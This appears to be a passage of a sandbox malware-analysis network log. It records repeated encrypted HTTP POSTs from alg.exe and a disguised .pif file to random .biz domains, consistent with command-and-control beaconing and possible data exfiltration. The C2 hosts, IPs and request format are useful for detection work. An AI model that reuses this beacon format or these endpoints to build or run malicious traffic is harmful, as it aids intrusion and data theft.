                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.061563969 CET802OUTData Raw: 82 3d db 84 2e ac 71 59 16 03 00 00 e1 5b ef 91 76 d4 1c 03 68 55 9e 50 2e 49 c3 72 be a7 e6 b0 01 74 33 1c 59 2a fb a1 f6 0d 6c 95 22 51 47 71 2e cc a0 38 d3 16 73 39 dc c3 57 f1 79 62 c6 0f 59 30 36 a3 17 82 fc 3d fe 6e a7 fa 76 a3 b4 5c be ce
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =.qY[vhUP.Irt3Y*l"QGq.8s9WybY06=nv\@kuljUky'f}F^Pfc$i:Z&"M&mL>}<9$U& B^mmLO"=(aQP3X4|x_
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.494748116 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e83d7f03c4bd2ed734410e0e18b9f629|173.254.250.82|1730445812|1730445812|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        11192.168.2.84972244.221.84.105804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.107912064 CET345OUTPOST /w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.107944965 CET778OUTData Raw: f4 ef b6 e7 b5 5b ab a3 fe 02 00 00 28 12 65 8b 64 87 b1 6f fd b6 fc 2d 3f fc 0d 9a 08 fc 69 11 80 4c 82 3e 30 b4 80 63 82 73 60 71 ce 5f df 42 7c 1a af 40 9b ee 63 46 2c c3 15 77 3b 63 e6 7a a9 84 9a 6f 17 bc 3e 66 c7 1f aa 6e 0f ce 14 11 1f c0
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [(edo-?iL>0cs`q_B|@cF,w;czo>fnt!-r`Lnnv391C#{kN8rt8c|Tv1l;mY-PQwtgx|RFCh_j[S{_(py&h?e


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        12192.168.2.84972344.221.84.105804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.261915922 CET355OUTPOST /rwebgnmbtiq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.261960030 CET778OUTData Raw: 3a 2a 46 5c 4c 99 4a 9e fe 02 00 00 6d 4c 2f 4d ad 70 46 b4 bc b7 f5 36 66 0c 59 f7 e7 fd 8c 2b ed 9e 74 cf 90 fa 4c 16 70 b6 39 5c b8 91 b2 11 81 28 31 af ba 76 7d 92 19 9e fe 91 c6 b4 8d dd bc be 4b b5 de 5a 94 18 74 fb 83 f2 12 4e ce 1b c9 fd
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :*F\LJmL/MpF6fY+tLp9\(1v}KZtNQT-|N*XaTS;f:/Ln?I3}'P.?=qL:6P&QPBoYGxPDc0%/wD^u=K1S8jU_=.2T,h:3+
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.914427042 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=12109dc7bd7c63cf0b11fd79a5cca861|173.254.250.82|1730445811|1730445811|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        13192.168.2.849725172.234.222.138804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.221102953 CET357OUTPOST /hmsaqgigfaxqle HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.221147060 CET778OUTData Raw: b0 61 d4 18 e7 57 5a 8a fe 02 00 00 65 4f 46 57 2b c5 94 02 1b f9 7b 65 46 96 37 9b 69 80 d9 f8 08 0e 99 d7 e8 e1 95 57 06 b5 be e2 44 62 65 9a 6f 3c 51 07 5d 88 06 6e c8 5f 66 20 57 a8 85 6c 05 39 09 ed ae f4 bb 0a a0 6d 43 5e bd 67 16 e1 2e 6b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: aWZeOFW+{eF7iWDbeo<Q]n_f Wl9mC^g.k:*S}v`Qd1Rd/8xT%v=<<"uXmW`y!P|"K2<v20450Q`noQEu}UxdSILvhl O<i4I-42N&


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        14192.168.2.84972882.112.184.197804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669454098 CET353OUTPOST /gcpevfxhbnb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669485092 CET802OUTData Raw: fb 0f 9c c5 4f 56 3f b9 16 03 00 00 3e dc 73 c3 d9 24 d4 de 37 65 31 d0 8b 20 bb af 43 bf 4d f4 ac bd 2f 4f bf 3c 88 29 54 05 35 f4 22 ab 7f fe cd a2 86 e9 7c 6e fa f9 92 cb 05 54 4a d4 a2 0e 5c 09 dc 82 02 e6 5a d6 bd 09 fc a8 d1 c6 c4 a5 e9 c8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: OV?>s$7e1 CM/O<)T5"|nTJ\ZL+}6E-t6jBy@'wz20k?VuslpqFHC3?tT=Dx6E~e>X5KOg0J[@@."Y9!P


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        15192.168.2.849729172.234.222.138804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669609070 CET352OUTPOST /tpnpycqre HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:33.669661045 CET778OUTData Raw: e8 db 8d c6 5d 42 4c f1 fe 02 00 00 cb 05 58 b3 82 d9 bd 1d fc 71 cc 08 90 41 a5 6a 7a e6 d6 39 66 ba 10 c9 7a 4c b8 1a d5 f9 58 e8 27 93 ef 83 2f 51 1a 6a fd 24 46 7c a6 19 c6 19 f1 31 d2 7f 8b d5 89 bd 8f e7 d9 65 5e 4f 64 a8 d3 4e 2a 76 40 07
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]BLXqAjz9fzLX'/Qj$F|1e^OdN*v@`.|*$E{jSK]7=,k\>5vj|,=2%Jp}H! h;_xJXM1_,7<&'o98rb aa\W_ZZs$v


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        16192.168.2.84973118.141.10.107804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.843611002 CET349OUTPOST /idnuv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.843650103 CET778OUTData Raw: 0a a9 ab 76 53 ef b0 20 fe 02 00 00 49 40 5c b8 4f ee aa 68 14 a4 2f 47 f5 43 07 a5 f7 a4 e1 a0 26 57 7c c4 00 f8 c0 af da b5 a3 c4 ae c5 ad 33 bb f2 d4 eb 6b ec c6 9a f3 02 d0 3a b0 3a 1c 76 2e 05 df 37 8a 22 91 45 8d 3a 41 8a 66 e4 75 a9 56 18
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: vS I@\Oh/GC&W|3k::v.7"E:AfuV|I3JF*ldO!YO~u|.;H,oC#q<QlK(D+0R=,P6w{nZ$71sa(BCPb.\A)=Wgx
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:36.270754099 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=96afb36215c8160bd49f91435305c047|173.254.250.82|1730445815|1730445815|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        17192.168.2.84973282.112.184.197804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.056054115 CET358OUTPOST /ifmujtvaxdtknray HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:35.056054115 CET802OUTData Raw: 5f b1 4d f0 13 36 15 d4 16 03 00 00 8c 32 de 24 67 95 d0 73 21 36 a3 ef 3c db e1 00 12 dc 60 60 63 34 0d ea 91 d6 af 1d 2f f9 96 6f 48 7f 70 b4 9b 59 b3 cf 4f 85 a4 2f 30 19 3b a6 7d 79 bf 44 c3 09 ad 51 0c 64 48 7c ce 0e 42 2b bf 8f 70 fa 7c c5
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: _M62$gs!6<``c4/oHpYO/0;}yDQdH|B+p|QRPA=7m`&&YESlE\_nu*?$H{V1%hTh:)]Nd0Jg+tAPjfYzldfgy)g


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        18192.168.2.84973382.112.184.197804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.514158964 CET343OUTPOST /f HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.514182091 CET778OUTData Raw: 02 01 4d 41 d0 11 f7 f5 fe 02 00 00 73 3d bc b9 bc 20 51 00 1d 33 e8 d0 48 01 f9 89 22 f0 f2 d1 9c c5 c6 97 78 b8 6a 7d 1c b0 5e 82 db bc 43 65 fa 0d 9f c3 7e 62 d0 19 53 f0 cf 4a 18 73 e0 81 18 f5 7e 8e 47 dc 7a 63 96 59 7f b5 65 df 64 12 13 11
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: MAs= Q3H"xj}^Ce~bSJs~GzcYed$w:9V b6JtWAT+}%F5+N)#:F2#Z,1M@~m]?\MjFDu?@NrLz<`6=[19Tj|hZ-?b


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        19192.168.2.84973482.112.184.197804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058592081 CET355OUTPOST /qrcvkhcipj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.058623075 CET802OUTData Raw: 49 3b a3 9e 47 ef ba 03 16 03 00 00 e8 27 c9 85 ce 52 c7 aa c8 e1 c3 c5 d7 0e 2e 19 87 0d 56 d1 89 b1 59 0a b4 18 16 15 68 6e 1e d7 5f 63 51 40 7f 50 f9 32 8f 68 9b 76 5d c5 5c cb c8 09 db 40 1f 4e 11 c7 83 30 29 d8 0f de 1e bf 04 bd 8f a4 1d 1e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: I;G'R.VYhn_cQ@P2hv]\@N0)T80)e K&k*<<7=jwp{w>*T{G1A<K|xc*E5'(3NyqW)5Kw4^"LMI26? +P


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        20192.168.2.84973582.112.184.197804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.240446091 CET360OUTPOST /lurykvmwmoqvfvd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:43.240446091 CET802OUTData Raw: 7e 17 41 4f 32 56 b1 bb 16 03 00 00 1e 50 dc e9 91 a1 d4 cb dd b3 53 04 b3 9d fd db fd 1c 46 46 1c 0c 8b e8 0c 73 85 fc b0 fb 96 cf 86 c6 b7 ae 31 4d ba b0 a9 fd 2d 55 5d 26 90 a8 11 ab 2c 1d 64 93 40 67 9c 41 8e c5 f0 c7 7c 5c 49 a0 f5 b4 af 55
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ~AO2VPSFFs1M-U]&,d@gA|\IU7~_vaG|h;/WA^R~aw5fkaQa>38mk~50,MzEYod"viDMr&r?mkCAk)']Qsf@;) &Ad.]


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        21192.168.2.84973682.112.184.197804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.138474941 CET343OUTPOST /p HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:46.138494968 CET778OUTData Raw: a0 2d 19 cc be 77 92 9e fe 02 00 00 cd 40 74 81 dd 6c 6d bc 65 1a c2 63 01 86 88 eb 97 e7 43 00 68 4e e5 ee 46 6d cc f4 a0 47 16 d9 a8 94 b1 b6 4a 3c 6f 2d 7c f9 63 78 83 96 b3 a6 d3 80 fe 0a b7 d3 2a 3c 2e 26 90 15 0e 2d 6f ed b0 15 ca 79 f0 f6
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -w@tlmecChNFmGJ<o-|cx*<.&-oyy`H:Yh0zN.12u|' Q>R(17ii=#(RHeqYemZ8b?o):+QRkCL#%@Qr\k.3EMXR=


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        22192.168.2.84973747.129.31.212804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.063050985 CET345OUTPOST /ou HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.063070059 CET802OUTData Raw: 61 fd 21 42 e8 c8 db fa 16 03 00 00 48 b6 a3 c6 f8 83 74 a5 cd 35 56 2d 51 3a 26 07 92 84 55 1d 20 4d 04 14 83 5c ba 53 76 3b 60 2a 29 f8 63 c7 6c cd 89 86 d4 b1 5c 97 a7 3d 9d 65 dd 0a af 0c c2 f9 dd 4f 3e ee af 41 ed 13 09 51 14 f8 27 08 4e 76
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a!BHt5V-Q:&U M\Sv;`*)cl\=eO>AQ'NvH4x$gqLw5m}zldx6](l&,CsmBZHno&yR?^gZ1'?1=ncb{(<g ]^nc4M^O;
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.554986954 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:23:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=94872b5c152c65e8c51b3b3ab6ee3056|173.254.250.82|1730445828|1730445828|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        23192.168.2.84973882.112.184.197804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.398230076 CET352OUTPOST /rnsuojk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
